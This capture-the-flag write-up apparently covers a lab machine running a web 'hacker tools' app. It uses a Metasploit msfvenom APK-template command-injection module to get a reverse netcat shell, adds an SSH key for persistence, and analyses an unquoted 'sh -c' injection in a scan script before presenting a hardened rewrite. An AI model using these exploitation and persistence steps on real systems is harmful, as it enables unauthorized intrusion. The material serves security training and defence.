```
# Nmap 7.91 scan initiated Mon Feb 8 19:00:29 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.129.77.135
Nmap scan report for 10.129.77.135
Host is up (0.029s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_  Supported Methods: POST HEAD GET OPTIONS
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 8 19:00:54 2021 -- 1 IP address (1 host up) scanned in 25.42 seconds
```
The web page on port 5000 is named k1d'5 h4ck3r t00l5 and allows us to use some commands:

- nmap: nmap
- payloads: msfvenom from Metasploit
- sploits: searchsploit from exploit-db
In the msfvenom (payloads) tool, we have the option to upload a custom template. And there is a recent vulnerability in exactly that feature, described by its Metasploit module:

```
This module exploits a command injection vulnerability in Metasploit
Framework's msfvenom payload generator when using a crafted APK file
as an Android payload template. Affects Metasploit Framework <=
6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this
module is a relatively empty yet valid-enough APK file. To trigger
the vulnerability, the victim user should do the following: msfvenom
-p android/<...> -x <crafted_file.apk>
```
```
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
```
**DisablePayloadHandler: True (no handler will be created!)**
```
Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run

[+] msf.apk stored at /home/noraj/.msf4/local/msf.apk
```
Then, in the web app, we select android as the payload type, upload the generated msf.apk as the custom template and set any value as lhost.
On our machine we just launch a listener:
```
$ pwncat -l 4444 -vv
INFO: Listening on :::4444 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:4444 (family 2/IPv4, TCP)
INFO: Client connected from 10.129.77.135:43478 (family 2/IPv4, TCP)
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
```
Note: the box has been patched, there is no longer an SSH key for kid, but we can add our own:

```
printf %s 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINDGLndVd+2+y7FE7nVTrMtBvPiLNTMgObVw8s7d9B8n noraj@penarch' >> /home/kid/.ssh/authorized_keys
```
There is another user named pwn owning a script, `/home/pwn/scanlosers.sh`:
```bash
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
# Field 3 onward of every log line is taken as the IP and interpolated
# unquoted into a string that is executed with sh -c.
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

# Empty the log once it has been processed.
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```
We have write access to /home/kid/logs/hackers. In the web app's source (app.py) we can see that the current date and our IP are written to this file when we try to bypass the searchsploit input filter:

```python
import datetime
import os
import random
import re
import subprocess
import tempfile
import time
from flask import Flask, render_template, request
from hashlib import md5
from werkzeug.utils import secure_filename

# regex_ip and regex_alphanum are compiled elsewhere in app.py (not shown here).

def scan(ip):
    if regex_ip.match(ip):
        if not ip == request.remote_addr and ip.startswith('10.10.1') and not ip.startswith('10.10.10.'):
            # Fake a "host down" result for this address range.
            stime = random.randint(200,400)/100
            time.sleep(stime)
            result = f"""Starting Nmap 7.80 ( https://nmap.org ) at {datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M")} UTC\nNote: Host seems down. If it is really up, but blocking our ping probes, try -Pn\nNmap done: 1 IP address (0 hosts up) scanned in {stime} seconds""".encode()
        else:
            # Argument list, no shell: the value is passed to nmap as a single argv entry.
            result = subprocess.check_output(['nmap', '--top-ports', '100', ip])
        return render_template('index.html', scan=result.decode('UTF-8', 'ignore'))
    return render_template('index.html', scanerror="invalid ip")

def searchsploit(text, srcip):
    if regex_alphanum.match(text):
        result = subprocess.check_output(['searchsploit', '--color', text])
        return render_template('index.html', searchsploit=result.decode('UTF-8', 'ignore'))
    else:
        # Rejected input is logged as "[<date> <time>] <srcip>"; this file is
        # later consumed by /home/pwn/scanlosers.sh.
        with open('/home/kid/logs/hackers', 'a') as f:
            f.write(f'[{datetime.datetime.now()}] {srcip}\n')
        return render_template('index.html', sserror="stop hacking me - well hack you back")
```
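To make the weakness of scanlosers.sh concrete from the defender's side, here is a hardened rewrite of it. This is an added example, not the box's own script or code from the original writeup. It keeps the log format written by the Flask searchsploit() handler above (`[<date> <time>] <ip>`, so field 3 onward is the IP) and the `recon/` output directory, and adds the two things the original lacks: every extracted field is validated as a strict dotted quad before use, and the value is passed to nmap as its own argument instead of being interpolated into a string for `sh -c`. The function names (`is_ipv4`, `extract_targets`, `scan_targets`) and the sample log lines in the comments are my own; the script is written in POSIX sh so it runs under dash or bash.

```shell
#!/bin/sh
# Hardened rewrite of /home/pwn/scanlosers.sh (added example, not the box's script).
# Assumed log line format, as written by the Flask app's searchsploit() handler:
#   [2021-02-08 19:00:29.123] 10.10.14.5
# so "cut -d' ' -f3-" yields the IP field, and anything an attacker appends to it.

# Return 0 only for a strict dotted quad with every octet in 0-255.
# Shell metacharacters, spaces, hostnames and empty strings are all rejected.
is_ipv4() {
    candidate=$1
    case $candidate in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    # Only digits and single dots remain, so splitting on dots is safe here.
    set -- $(printf '%s\n' "$candidate" | tr '.' ' ')
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Print one validated, de-duplicated target per line from the log file.
# Entries that do not yield a clean IP are reported on stderr and dropped.
extract_targets() {
    logfile=$1
    cut -d' ' -f3- "$logfile" | sort -u | while read -r entry; do
        if is_ipv4 "$entry"; then
            printf '%s\n' "$entry"
        else
            printf 'rejected log entry: %s\n' "$entry" >&2
        fi
    done
}

# Scan each validated target. The IP is a separate argument to nmap and is
# never handed to sh -c, so it cannot be interpreted as shell syntax.
scan_targets() {
    logfile=$1
    cd /home/pwn/ || return 1
    mkdir -p recon
    # Word splitting is safe: extract_targets only emits validated IPs.
    for target in $(extract_targets "$logfile"); do
        nmap --top-ports 10 -oN "recon/${target}.nmap" "$target" >/dev/null 2>&1 &
    done
    wait
    # Truncate the log only after its entries were consumed, as the original does.
    if [ -s "$logfile" ]; then : > "$logfile"; fi
    return 0
}

# Usage:
#   scan_targets /home/kid/logs/hackers
```

The validation lives in its own function so it can be checked in isolation; in the original, the only "filter" is whatever `cut` happens to leave in field 3 onward, which is exactly the part of the line the log writer copies from request data.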